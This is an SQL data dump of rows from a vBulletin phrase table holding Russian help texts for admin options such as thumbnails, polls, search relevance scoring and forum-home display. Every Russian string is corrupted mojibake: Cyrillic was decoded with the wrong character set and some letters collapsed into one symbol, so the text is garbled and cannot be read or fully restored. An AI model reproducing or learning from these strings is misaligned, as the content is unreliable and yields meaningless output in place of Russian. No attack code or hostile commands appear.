(23370, -1, 'options_options_attachthumbssize_text', 'cphelptext', 'Ââåäèòå öåëîå ïîëîæèòåëüÃîå ÷èñëî. ÌèÃèà òþðû áóäóò ïîñòðîåÃû ïî ðà çìåðà ì, ÃÃ¥ ïðåâîñõîäÿùèì ýòî ÷èñëî. \r\nÅñëè âû èçìåÃèëè ýòî çÃà ÷åÃèå è ó âà ñ ñóùåñòâóþò âëîæåÃèÿ èçîáðà æåÃèé Ãà ôîðóìå, âà ì áóäåò Ãåîáõîäèìî ïåðåñòðîèòü ìèÃèà òþðû äëÿ îáÃîâëåÃèÿ ìèÃèà òþð ê ñóùåñòâóþùèì âëîæåÃèÿì.', 'vbulletin', '', 0, ''),
(23371, -1, 'options_options_attachthumbssize_title', 'cphelptext', 'Ãà çìåð ìèÃèà òþð', 'vbulletin', '', 0, ''),
(23372, -1, 'options_options_thumbquality_text', 'cphelptext', 'Êà ÷åñòâî èëè ðà çìåð?.. Ãåøà òü âà ì! Âû ìîæåòå ïîýêñïåðèìåÃòèðîâà òü, ÷òîáû Ãà éòè õîðîøóþ ïðîïîðöèþ. 75 - îáû÷Ãî õîðîøåå ñîîòÃîøåÃèå êà ÷åñòâà è ðà çìåðà .', 'vbulletin', '', 0, ''),
(23373, -1, 'options_options_thumbquality_title', 'cphelptext', 'Êà ÷åñòâî ìèÃèà òþð', 'vbulletin', '', 0, ''),
(23374, -1, 'options_options_attachrow_text', 'cphelptext', 'Ââåäèòå öåëîå ïîëîæèòåëüÃîå ÷èñëî. \r\nÃòà îïöèÿ ìîæåò áûòü èñïîëüçîâà Ãà äëÿ ðà ñïîëîæåÃèÿ ìèÃèà òþð Ãà âà øåì ôîðóìå.', 'vbulletin', '', 0, ''),
(23375, -1, 'options_options_attachrow_title', 'cphelptext', 'Êîëè÷åñòâî ìèÃèà òþð âëîæåÃèé â îäÃîé ñòðîêå', 'vbulletin', '', 0, ''),
(23376, -1, 'options_options_maxpolloptions_text', 'cphelptext', 'Îãðà Ãè÷åÃèå ìà êñèìà ëüÃîãî ÷èñëà âà ðèà Ãòîâ îòâåòîâ â îïðîñà õ, ñîçäà âà åìûõ ïîëüçîâà òåëÿìè.', 'vbulletin', '', 0, ''),
(23377, -1, 'options_options_maxpolloptions_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî âà ðèà Ãòîâ îòâåòà â îïðîñå', 'vbulletin', '', 0, ''),
(23378, -1, 'options_options_maxpolllength_text', 'cphelptext', 'Ãðè Ãà ïèñà Ãèè âà ðèà Ãòà îòâåòà â ãîëîñîâà Ãèè, ÷èñëî ñèìâîëîâ äëÿ ââîäà ÃÃ¥ äîëæÃî ïðåâûøà òü ÷èñëà , óêà çà ÃÃîãî â ýòîì ïîëå.', 'vbulletin', '', 0, ''),
(23379, -1, 'options_options_maxpolllength_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ äëèÃà âà ðèà Ãòà îòâåòà â îïðîñå', 'vbulletin', '', 0, ''),
(23380, -1, 'options_options_updatelastpost_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî ïðè êà æäîì Ãîâîì ãîëîñå â îïðîñå áóäåò îáÃîâëÿòüñÿ âðåìÿ ïîñëåäÃåãî èçìåÃÃ¥Ãèÿ òåìû.', 'vbulletin', '', 0, ''),
(23381, -1, 'options_options_updatelastpost_title', 'cphelptext', 'ÎáÃîâëåÃèå âðåìåÃè ïðè êà æäîì Ãîâîì ãîëîñå â îïðîñå', 'vbulletin', '', 0, ''),
(23382, -1, 'options_options_showvotes_text', 'cphelptext', 'Ââåäèòå ïîëîæèòåëüÃîå öåëîå ÷èñëî. \r\n\r\nÃåéòèÃãè òåìû ìîãóò áûòü Ãåòî÷Ãûìè, åñëè ïðîãîëîñîâà ëî âñåãî Ãåñêîëüêî ÷åëîâåê. Ãòîò ïà ðà ìåòð ìîæåò áûòü èñïîëüçîâà à äëÿ çà äåðæêè îòîáðà æåÃèÿ ðåçóëüòà òîâ äî Ãà áîðà óêà çà ÃÃîãî çäåñü êîëè÷åñòâà ãîëîñîâ, ÷òîáû ïîëó÷èòü áîëåå òî÷Ãûé ðåéòèÃã òåìû.', 'vbulletin', '', 0, ''),
(23383, -1, 'options_options_showvotes_title', 'cphelptext', 'Êîëè÷åñòâî îöåÃîê äëÿ îòîáðà æåÃèÿ ðåéòèÃãà ', 'vbulletin', '', 0, ''),
(23384, -1, 'options_options_votechange_text', 'cphelptext', 'Âêëþ÷à ÿ ýòó îïöèþ, âû ðà çðåøà åòå ïîëüçîâà òåëÿì îöåÃèòü òåìó, à çà òåì èçìåÃèòü ñâîþ îöåÃêó.', 'vbulletin', '', 0, ''),
(23385, -1, 'options_options_votechange_title', 'cphelptext', 'Ãà çðåøèòü ïîëüçîâà òåëÿì ìåÃÿòü îöåÃêó òåìû', 'vbulletin', '', 0, ''),
(23386, -1, 'options_options_enablesearches_text', 'cphelptext', 'Ãîèñê - î÷åÃü ïîëåçÃà ÿ ôóÃêöèÿ, Ãî îÃà ìîæåò ïîäòîðìà æèâà òü ñåðâåð Ãà áîëüøèõ ôîðóìà õ. Åñëè âû îáåñïîêîåÃû çà ãðóæåÃÃîñòüþ ñåðâåðà , âûêëþ÷èòå ýòó îïöèþ.', 'vbulletin', '', 0, ''),
(23387, -1, 'options_options_enablesearches_title', 'cphelptext', 'Ãîèñê âêëþ÷åÃ', 'vbulletin', '', 0, ''),
(23388, -1, 'options_options_searchfloodtime_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ìîæåò áûòü èñïîëüçîâà à äëÿ îãðà Ãè÷åÃèÿ êîëè÷åñòâà ïîèñêîâ, êîòîðûå ìîæåò ñäåëà òü îäèà ïîëüçîâà òåëü çà îïðåäåëåÃÃûé ïðîìåæóòîê âðåìåÃè. Ãòî ïîëåçÃî äëÿ ïðåäîòâðà ùåÃèÿ çà õâà òà ðåñóðñîâ ñåðâåðà äëÿ ïîèñêà ïî îãðîìÃûì ôîðóìà ì.', 'vbulletin', '', 0, ''),
(23389, -1, 'options_options_searchfloodtime_title', 'cphelptext', 'Çà äåðæêà ìåæäó ïîèñêà ìè', 'vbulletin', '', 0, ''),
(23390, -1, 'options_options_minsearchlength_text', 'cphelptext', 'Óñòà Ãîâêà ìèÃèìà ëüÃîé äëèÃû ñëîâ, êîòîðûå áóäóò èÃäåêñèðîâà òüñÿ ñèñòåìîé ïîèñêà . \r\n Ãà ïðèìåð ïðè âûáîðå çÃà ÷åÃèÿ \"4\", ïîëüçîâà òåëè ÃÃ¥ ñìîãóò èñêà òü ñëîâà , ñîñòîÿùèå èç òðåõ ñèìâîëîâ. Âû ìîæåòå óìåÃüøèòü ðà çìåð âà øåé áà çû äà ÃÃûõ, óâåëè÷èâ ýòî ÷èñëî è âûïîëÃèâ ðåèÃäåêñà öèþ .', 'vbulletin', 'zCarot', 1205941572, '3.7.0 Release Candidate 1'),
(23391, -1, 'options_options_minsearchlength_title', 'cphelptext', 'ÌèÃèìà ëüÃà ÿ äëèÃà èÃäåêñèðóåìûõ ñëîâ', 'vbulletin', '', 0, ''),
(23392, -1, 'options_options_maxsearchlength_text', 'cphelptext', 'Ãòà îïöèÿ îãðà Ãè÷èâà åò ìà êñèìà ëüÃûé ðà çìåð ñëîâ, êîòîðûå ïîëüçîâà òåëü ñìîæåò èñêà òü, êà ê äëÿ ñòà Ãäà ðòÃîãî ïîèñêà ïî ôîðóìó, òà ê è äëÿ ïîèñêà fulltext. Ãà ïðèìåð, åñëè çäåñü óêà çà Ãî 15, òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò èñêà òü ñëîâà , ñîñòîÿùèå èç 16 ñèìâîëîâ. \r\nÃðè èñïîëüçîâà Ãèè ñòà Ãäà ðòÃîãî ïîèñêà ïî ôîðóìó, ýòà îïöèÿ îãðà Ãè÷èâà åò ìà êñèìà ëüÃûé ðà çìåð èÃäåêñèðóåìûõ ñëîâ. ×åì áîëüøå ÷èñëî, óêà çà ÃÃîå çäåñü, òåì áîëüøå ðà çìåð âà øåãî èÃäåêñà ïîèñêà , è, ñîîòâåòñòâåÃÃî, ðà çìåð âà øåé áà çû äà ÃÃûõ. Âû ìîæåòå óìåÃüøèòü ðà çìåð âà øåé áà çû äà ÃÃûõ, óìåÃüøèâ ýòî çÃà ÷åÃèå, à çà òåì ïðîèçâåäÿ ïåðåèÃäåêñà öèþ çäåñü .', 'vbulletin', 'zCarot', 1222169399, '3.8.0 Alpha 2'),
(23393, -1, 'options_options_maxsearchlength_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ äëèÃà èÃäåêñèðóåìûõ ñëîâ', 'vbulletin', '', 0, ''),
(23394, -1, 'options_options_goodwords_text', 'cphelptext', 'Èñïîëüçóéòå ýòó îïöèþ äëÿ òîãî, ÷òîáû ïîèñê ôîðóìà èÃäåêñèðîâà ë óêà çà ÃÃûå çäåñü ñëîâà , äà æå åñëè îÃè ìåÃüøå (áîëüøå) óñòà ÃîâëåÃÃîãî äëÿ èÃäåêñèðîâà Ãèÿ ïðåäåëà ïî äëèÃÃ¥ ñëîâà (â ñèìâîëà õ).', 'vbulletin', '', 0, ''),
(23395, -1, 'options_options_goodwords_title', 'cphelptext', 'Ñëîâà , îáÿçà òåëüÃî èÃäåêñèðóåìûå ïîèñêîì', 'vbulletin', '', 0, ''),
(23396, -1, 'options_options_searchperpage_text', 'cphelptext', 'Ãà ïðèìåð, åñëè çäåñü óêà çà Ãî 25, òî ïîëüçîâà òåëþ ïðèäåòñÿ ïåðåéòè Ãà âòîðóþ ñòðà Ãèöó, ÷òîáû óâèäåòü ðåçóëüòà òû 26-50. \r\n \r\nÃîìÃèòå: Ãòî ÷èñëî äîëæÃî áûòü áîëüøå Ãóëÿ.', 'vbulletin', 'zCarot', 1208955706, '3.7.0 Release Candidate 4'),
(23397, -1, 'options_options_searchperpage_title', 'cphelptext', 'Êîëè÷åñòâî Ãà éäåÃÃûõ ñîîáùåÃèé Ãà ñòðà Ãèöó', 'vbulletin', '', 0, ''),
(23398, -1, 'options_options_maxresults_text', 'cphelptext', 'Ãà ïðèìåð, åñëè çäåñü óñòà Ãîâèòü \"200\", à Ãà éäåÃî ïî ðåçóëüòà òà ì ïîèñêà áóäåò 300 ñîâïà äåÃèé, òîëüêî ïåðâûå 200 Ãà éäåÃÃûõ çà ïèñåé áóäóò îòîáðà æåÃû.', 'vbulletin', '', 0, ''),
(23399, -1, 'options_options_maxresults_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî ðåçóëüòà òîâ ïîèñêà ', 'vbulletin', '', 0, ''),
(23400, -1, 'options_options_allowwildcards_text', 'cphelptext', 'Ãðè âêëþ÷åÃèè ýòîé îïöèè ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü ìà ñêè (çâåçäî÷êó *) ïðè ïîèñêå. Çâåçäî÷êà ïîäðà çóìåâà åò ëþáîå êîëè÷åñòâî è êîìáèÃà öèþ ñèìâîëîâ â òîé ÷à ñòè ñëîâà , êîòîðóþ çà ìåÃÿåò çâåçäî÷êà .', 'vbulletin', '', 0, ''),
(23401, -1, 'options_options_allowwildcards_title', 'cphelptext', 'Ãà çðåøèòü ìà ñêè â ïîèñêå', 'vbulletin', '', 0, ''),
(23402, -1, 'options_options_similarthreadsearch_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, ôîðóì áóäåò äåëà òü ïîñòðîåÃèå ñïèñêà ïîõîæèõ òåì äëÿ Ãîâîé òåìû. ×òîáû îòîáðà æà òü ïîõîæèå òåìû, âà ì ñëåäóåò âêëþ÷èòü îïöèþ \"Îòîáðà æà òü ïîõîæèå òåìû\" çäåñü . \r\n\r\nÅñëè âû áåñïîêîèòåñü î Ãà ãðóçêå Ãà ñåðâåð, òî âû ìîæåòå âûêëþ÷èòü ýòó îïöèþ.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(23403, -1, 'options_options_similarthreadsearch_title', 'cphelptext', 'Àâòîìà òè÷åñêèé ïîèñê ïîõîæèõ òåì', 'vbulletin', '', 0, ''),
(23404, -1, 'options_options_searchsharing_text', 'cphelptext', 'Äëÿ ñîõðà ÃÃ¥Ãèÿ ðåñóðñîâ, ôîðóì áóäåò èñïîëüçîâà òü îáùèå ðåçóëüòà òû ïîèñêà äëÿ ïîëüçîâà òåëåé â òå÷åÃèè ÷à ñà . Îòðèöà òåëüÃîé ñòîðîÃîé ýòîé ôóÃêöèè ÿâëÿåòñÿ òî, ÷òî ïðè èçìåÃÃ¥Ãèè â òå÷åÃèå ÷à ñà òåìû, â êîòîðîé åñòü çà ïðà øèâà åìà ÿ ñòðîêà , ðåçóëüòà òû ïîèñêà ÃÃ¥ îáÃîâÿòñÿ. Ãà ïðèìåð, ïîëüçîâà òåëü èùåò \"ìîðêîâü\", ñîðòèðóÿ ðåçóëüòà òû â ïîðÿäêå äà òû ñîçäà Ãèÿ ñîîáùåÃèÿ. ×åðåç ïîë÷à ñà äðóãîé ïîëüçîâà òåëü èùåò \"ìîðêîâü\". Åñëè âòîðîé ïîèñê áóäåò ñ òåìè æå ïà ðà ìåòðà ìè, ÷òî è ïåðâûé (ïîðÿäîê ñîðòèðîâêè, òèï ïîèñêà è ò.ä.) òî ôîðóì áóäåò èñïîëüçîâà òü ïðîøëûé ðåçóëüòà ò ïîèñêà . Åñëè â òå÷åÃèå ýòîãî ïîëó÷à ñà òåìû èçìåÃèëèñü, òà ê êà ê êòî-òî îñòà âèë Ãîâóþ çà ïèñü, òî ñîðòèðîâêà ïî äà òå óæå áóäåò ÃÃ¥ à êòóà ëüÃîé. Ãòî Ãåáîëüøîå Ãåñîîòâåòñòâèå ìîæåò áûòü èñïðà âëåÃî ñ ïîìîùüþ èçìåÃÃ¥Ãèÿ ýòîé îïöèè.', 'vbulletin', '', 0, ''),
(23405, -1, 'options_options_searchsharing_title', 'cphelptext', 'Îáùèå ðåçóëüòà òû ïîèñêà ', 'vbulletin', '', 0, ''),
(23406, -1, 'options_options_similarthreadthreshold_text', 'cphelptext', 'Ãåçóëüòà òû ïîèñêà ñîðòèðóþòñÿ ïî ðåëåâà ÃòÃîñòè. Ãòîò ïà ðà ìåòð îïðåäåëÿåò ìèÃèìà ëüÃûé êðèòåðèé ðåëåâà ÃòÃîñòè, êîòîðûé äîëæåà èìåòü ïîèñê \"ïîõîæèõ òåì\", ÷òîáû ñêà çà òü, ÷òî ýòî ïîõîæà ÿ òåìà . \r\n\r\nÂû ìîæåòå èçìåÃèòü ñèñòåìó îöåÃêè ðåëåâà ÃòÃîñòè çäåñü .', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(23407, -1, 'options_options_similarthreadthreshold_title', 'cphelptext', 'Êðèòåðèé ðåëåâà ÃòÃîñòè ïîõîæèõ òåì', 'vbulletin', '', 0, ''),
(23408, -1, 'options_options_badwords_text', 'cphelptext', 'Ãåêîòîðûå îáùèå ñëîâà óæå èñêëþ÷åÃû èç ïîèñêà . Âû ìîæåòå óâèäåòü \"ïëîõèå ñëîâà ïî óìîë÷à Ãèþ\" â ôà éëå includes/searchwords.php .', 'vbulletin', '', 0, ''),
(23409, -1, 'options_options_badwords_title', 'cphelptext', 'Ñëîâà , èñêëþ÷à åìûå èç ïîèñêà ', 'vbulletin', '', 0, ''),
(23410, -1, 'options_options_searchimagecheck_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî ïåðåä ïîèñêîì ãîñòè äîëæÃû áóäóò ââåñòè òåêñò, êîòîðûé áóäåò Ãà ñëó÷à éÃî ñãåÃåðèðîâà ÃÃîì èçîáðà æåÃèè, ÷òîáû äîêà çà òü, ÷òî îÃè ëþäè, à ÃÃ¥ ñïåöèà ëüÃûå ïðîãðà ììû-áîòû.', 'vbulletin', 'zCarot', 1155819310, '3.6.1'),
(23411, -1, 'options_options_searchimagecheck_title', 'cphelptext', 'Ãðîâåðêà èçîáðà æåÃèåì ïîèñêà îò ãîñòåé', 'vbulletin', 'zCarot', 1155819310, '3.6.1'),
(23412, -1, 'options_options_multimatchscore_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò óâåëè÷èòü ïîêà çà òåëü ðåëåâà ÃòÃîñòè ðåçóëüòà òîâ ïîèñêà , ñîäåðæà ùèõ Ãåñêîëüêî èñêîìûõ ñëîâ (åñëè â çà ïðîñå îïðåäåëåÃî Ãåñêîëüêî ñëîâ). \r\n Ãà ïðèìåð, åñëè âà øà ñòðîêà ïîèñêà ñîäåðæèò äâà ñëîâà , òî ñîîáùåÃèÿ, ñîäåðæà ùèå îáà èñêîìûõ ñëîâà , ïîëó÷à ò áîëåå âûñîêèé ïîêà çà òåëü ðåëåâà ÃòÃîñòè, ÷åì ñîîáùåÃèÿ, ñîäåðæà ùèå òîëüêî îäÃî èç èñêîìûõ ñëîâ.', 'vbulletin', '', 0, ''),
(23413, -1, 'options_options_multimatchscore_title', 'cphelptext', 'ÓðîâåÃü ðåëåâà ÃòÃîñòè ïî êà æäîìó Ãà éäåÃÃîìó ñëîâó', 'vbulletin', '', 0, ''),
(23414, -1, 'options_options_datescore_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò óâåëè÷èâà òü ðåëåâà ÃòÃîñòü ñâåæèõ ñîîáùåÃèé â ðåçóëüòà òà õ ïîèñêà . \r\nÃòî ìîæåò áûòü ïîëåçÃî â ïîèñêîâûõ çà ïðîñà õ èç Ãåñêîëüêèõ ñëîâ. Ãà ïðèìåð, â ðåçóëüòà òà õ ïîèñêà ñâåæåå ñîîáùåÃèå ñ ñîâïà äåÃèåì îäÃîãî ñëîâà ìîæåò ïîëó÷èòü áÎëüøóþ ðåëåâà ÃòÃîñòü, ÷åì ñîâñåì ñòà ðîå ñîîáùåÃèå ñ ñîâïà äåÃèåì âñåõ ñëîâ.', 'vbulletin', '', 0, ''),
(23415, -1, 'options_options_datescore_title', 'cphelptext', 'ÓðîâåÃü ðåëåâà ÃòÃîñòè çà ñâåæåñòü ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(23416, -1, 'options_options_threadtitlescore_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò äà òü áîëüøèé ðåéòèÃã ðåëåâà ÃòÃîñòè, åñëè ñëîâà äëÿ ïîèñêà ñîäåðæà òñÿ â Ãà çâà Ãèè òåìû.', 'vbulletin', '', 0, ''),
(23417, -1, 'options_options_threadtitlescore_title', 'cphelptext', 'ÓðîâåÃü ðåëåâà ÃòÃîñòè çà Ãà çâà Ãèå òåìû', 'vbulletin', '', 0, ''),
(23418, -1, 'options_options_posttitlescore_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì äà òü áîëüøóþ îöåÃêó ðåëåâà ÃòÃîñòè äëÿ ðåçóëüòà òîâ ïîèñêà , åñëè ýòè ñëîâà ñîäåðæà òñÿ â çà ãîëîâêà õ ñîîáùåÃèé. Ãòî âëèÿåò Ãà çà ãîëîâêè ñîîáùåÃèé, à ÃÃ¥ Ãà Ãà çâà Ãèÿ òåì.', 'vbulletin', '', 0, ''),
(23419, -1, 'options_options_posttitlescore_title', 'cphelptext', 'ÓðîâåÃü ðåëåâà ÃòÃîñòè çà çà ãîëîâîê ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(23420, -1, 'options_options_replyscore_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì äà òü áîëåå âûñîêóþ îöåÃêó ðåëåâà ÃòÃîñòè, åñëè ðåçóëüòà òû ïîèñêà áóäóò âêëþ÷à òü òåìû ñ áîëüøèì êîëè÷åñòâîì îòâåòîâ. \r\n\r\nÃîìÃèòå, ÷òî êîëè÷åñòâî ÃÃ¥ ÿâëÿåòñÿ ïðèçÃà êîì êà ÷åñòâà , ïîýòîìó ýòîò ïà ðà ìåòð ìîæåò ïåðåòà ñîâà òü ðåçóëüòà òû ïîèñêà .', 'vbulletin', '', 0, ''),
(23421, -1, 'options_options_replyscore_title', 'cphelptext', 'ÓðîâåÃü ðåëåâà ÃòÃîñòè çà êîëè÷åñòâî îòâåòîâ', 'vbulletin', '', 0, ''),
(23422, -1, 'options_options_replyfunc_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì âûïîëÃèòü ôóÃêöèþ PHP Ãà ä $replyscore äëÿ ðåçóëüòà òîâ ïîèñêà . Ãà ïðèìåð, Ãà ì Ãåîáõîäèìî âîçâðà òèòü log() (Ãà òóðà ëüÃûé ëîãà ðèôì) çÃà ÷åÃèÿ $replyscore. Äëÿ ýòîãî ââåäèòå ñþäà \'safelog\' êà ê èìÿ ôóÃêöèè.', 'vbulletin', '', 0, ''),
(23423, -1, 'options_options_replyfunc_title', 'cphelptext', 'ÔóÃêöèÿ ïîäñ÷¸òà ðåëåâà ÃòÃîñòè ïî êîëè÷åñòâó îòâåòîâ', 'vbulletin', '', 0, ''),
(23424, -1, 'options_options_viewscore_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì äà òü áîëåå âûñîêóþ îöåÃêó ðåëåâà ÃòÃîñòè, åñëè ðåçóëüòà òû ïîèñêà áóäóò âêëþ÷à òü òåìû ñ áîëüøèì êîëè÷åñòâîì ïðîñìîòðîâ. \r\n\r\nÃîìÃèòå, ÷òî êîëè÷åñòâî ÃÃ¥ ÿâëÿåòñÿ ïðèçÃà êîì êà ÷åñòâà , ïîýòîìó ýòîò ïà ðà ìåòð ìîæåò ïåðåòà ñîâà òü ðåçóëüòà òû ïîèñêà .', 'vbulletin', '', 0, ''),
(23425, -1, 'options_options_viewscore_title', 'cphelptext', 'ÓðîâåÃü ðåëåâà ÃòÃîñòè çà êîëè÷åñòâî ïðîñìîòðîâ', 'vbulletin', '', 0, ''),
(23426, -1, 'options_options_viewfunc_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì âûïîëÃèòü ôóÃêöèþ PHP Ãà ä $viewscore äëÿ ðåçóëüòà òîâ ïîèñêà . Ãà ïðèìåð, Ãà ì Ãåîáõîäèìî âîçâðà òèòü log() (Ãà òóðà ëüÃûé ëîãà ðèôì) çÃà ÷åÃèÿ $viewscore. Äëÿ ýòîãî ââåäèòå ñþäà \'safelog\' êà ê èìÿ ôóÃêöèè.', 'vbulletin', '', 0, ''),
(23427, -1, 'options_options_viewfunc_title', 'cphelptext', 'ÓðîâåÃü ðåëåâà ÃòÃîñòè çà êîëè÷åñòâî ïðîñìîòðîâ', 'vbulletin', '', 0, ''),
(23428, -1, 'options_options_ratescore_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì äà òü áîëåå âûñîêóþ îöåÃêó ðåëåâà ÃòÃîñòè â ðåçóëüòà òà õ ïîèñêà , åñëè îÃè Ãà õîäÿòñÿ â òåìà õ ñ áîëåå âûñîêèì ðåéòèÃãîì.', 'vbulletin', '', 0, ''),
(23429, -1, 'options_options_ratescore_title', 'cphelptext', 'ÊîýôôèöèåÃò ðåëåâà ÃòÃîñòè ïî ðåéòèÃãó', 'vbulletin', '', 0, ''),
(23430, -1, 'options_options_ratefunc_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì âûïîëÃèòü ôóÃêöèþ PHP Ãà ä $ratingscore äëÿ ðåçóëüòà òîâ ïîèñêà . Ãà ïðèìåð, Ãà ì Ãåîáõîäèìî âîçâðà òèòü log() (Ãà òóðà ëüÃûé ëîãà ðèôì) çÃà ÷åÃèÿ $ratingscore. Äëÿ ýòîãî ââåäèòå ñþäà \'safelog\' êà ê èìÿ ôóÃêöèè.', 'vbulletin', '', 0, ''),
(23431, -1, 'options_options_ratefunc_title', 'cphelptext', 'ÊîýôôèöèåÃò ðåëåâà ÃòÃîñòè ïî ðåéòèÃãó', 'vbulletin', '', 0, ''),
(23432, -1, 'options_options_forumhome_text', 'cphelptext', 'Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ äëÿ èçìåÃÃ¥Ãèÿ èìåÃè Ãà ÷à ëüÃîãî ôà éëà (index), òî åñòü âû ñìîæåòå ïîìåñòèòü Ãà åãî ìåñòî ñâîé index. ÃåðåìåùåÃèå Ãà ÷à ëüÃîãî ôà éëà ôîðóìà îáû÷Ãî èñïîëüçóåòñÿ ïðè Ãà ëè÷èè âñòóïèòåëüÃûõ ðîëèêîâ èëè Ãà õîæäåÃèè ôîðóìà â ïîðòà ëå, ãäå ãëà âÃà ÿ ñòðà Ãè÷êà - ïîðòà ëüÃà ÿ. Ñóùåñòâóåò î÷åÃü ìÃîãî ðà çëè÷Ãûõ âîçìîæÃîñòåé èñïîëüçîâà Ãèÿ ýòîãî õîäà .', 'vbulletin', 'zCarot', 1204936640, '3.7.0 Release Candidate 1'),
(23433, -1, 'options_options_forumhome_title', 'cphelptext', 'Ñêðèïò ãëà âÃîé ñòðà Ãèöû', 'vbulletin', '', 0, ''),
(23434, -1, 'options_options_displayloggedin_text', 'cphelptext', 'Åñëè âû âêëþ÷èòå ýòó îïöèþ, òî Ãà ãëà âÃîé ñòðà Ãèöå ôîðóìà áóäåò îòîáðà æà òüñÿ ñïèñîê ïîëüçîâà òåëåé, Ãà õîäÿùèõñÿ Ãà ôîðóìå â äà ÃÃûé ìîìåÃò. Åñëè âû çà áîòèòåñü î ïðîèçâîäèòåëüÃîñòè, òî âûêëþ÷èòå ýòî. Ñóùåñòâóåò 4 âà ðèà Ãòà îòîáðà æåÃèÿ: \r\nÄà , ïî à ëôà âèòó äëÿ âñåõ ïîñåòèòåëåé - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â à ëôà âèòÃîì ïîðÿäêå ñïèñêà âñåõ ãîñòåé è ó÷à ñòÃèêîâ ôîðóìà . \r\nÄà , ñëó÷à éÃî äëÿ âñåõ ïîñåòèòåëåé - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â ñëó÷à éÃîì ïîðÿäêå ñïèñêà âñåõ ãîñòåé è ó÷à ñòÃèêîâ ôîðóìà . \r\nÄà , ïî à ëôà âèòó òîëüêî äëÿ ó÷à ñòÃèêîâ - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â à ëôà âèòÃîì ïîðÿäêå ñïèñêà òîëüêî ó÷à ñòÃèêîâ ôîðóìà . \r\nÄà , ñëó÷à éÃî òîëüêî äëÿ ó÷à ñòÃèêîâ - ýòîò âà ðèà Ãò ïðåäïîëà ãà åò îòîáðà æåÃèå â ñëó÷à éÃîì ïîðÿäêå ñïèñêà òîëüêî ó÷à ñòÃèêîâ ôîðóìà .', 'vbulletin', 'zCarot', 1145485707, '3.6.0 Beta 1'),
(23435, -1, 'options_options_displayloggedin_title', 'cphelptext', 'Îòîáðà æåÃèå âîøåäøèõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23436, -1, 'options_options_showbirthdays_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî Ãà ãëà âÃîé ñòðà Ãèöå ôîðóìà áóäóò îòîáðà æåÃû ñåãîäÃÿøÃèå äÃè ðîæäåÃèÿ.', 'vbulletin', '', 0, ''),
(23437, -1, 'options_options_showbirthdays_title', 'cphelptext', 'Îòîáðà æà òü ñåãîäÃÿøÃèå äÃè ðîæäåÃèÿ', 'vbulletin', '', 0, ''),
(23438, -1, 'options_options_birthdaydatecut_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò îòîáðà æà òü äÃè ðîæäåÃèÿ òîëüêî à êòèâÃûõ ïîëüçîâà òåëåé. ×òîáû îïöèÿ ðà áîòà ëà , Ãåîáõîäèìî âêëþ÷èòü îïöèþ \"Îòîáðà æà òü ñåãîäÃÿøÃèå äÃè ðîæäåÃèÿ\"', 'vbulletin', '', 0, ''),
(23439, -1, 'options_options_birthdaydatecut_title', 'cphelptext', 'Ãîêà çûâà òü äÃè ðîæäåÃèÿ òîëüêî à êòèâÃûõ ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23440, -1, 'options_options_showevents_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ìîæåò áûòü èñïîëüçîâà à äëÿ îãðà Ãè÷åÃèÿ êîëè÷åñòâà òåêóùèõ ñîáûòèé, îòîáðà æà åìûõ Ãà ãëà âÃîé ñòðà Ãèöå âà øåãî ôîðóìà .', 'vbulletin', '', 0, ''),
(23441, -1, 'options_options_showevents_title', 'cphelptext', 'Îòîáðà æà òü ñîáûòèÿ êà ëåÃäà ðÿ', 'vbulletin', '', 0, ''),
(23442, -1, 'options_options_showholidays_text', 'cphelptext', 'Åñëè ýòà îïöèÿ âêëþ÷åÃà , òî Ãà ãëà âÃîé ñòðà Ãèöå ôîðóìà áóäóò îòîáðà æåÃû Ãà ñòóïà þùèå ïðà çäÃèêè. Ãðà çäÃèêè ìîãóò áûòü èçìåÃÃ¥Ãû çäåñü .', 'vbulletin', '', 0, ''),
(23443, -1, 'options_options_showholidays_title', 'cphelptext', 'Îòîáðà æà òü ïðà çäÃèêè', 'vbulletin', '', 0, ''),
(23444, -1, 'options_options_showeventtype_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð ïîçâîëÿåò âà ì ãðóïïèðîâà òü Ãà ñòóïà þùèå ñîáûòèÿ ïî ñîáûòèþ èëè äà òå.', 'vbulletin', '', 0, ''),
(23445, -1, 'options_options_showeventtype_title', 'cphelptext', 'Ñïîñîá îòîáðà æåÃèÿ Ãà ñòóïà þùèõ ñîáûòèé', 'vbulletin', '', 0, ''),
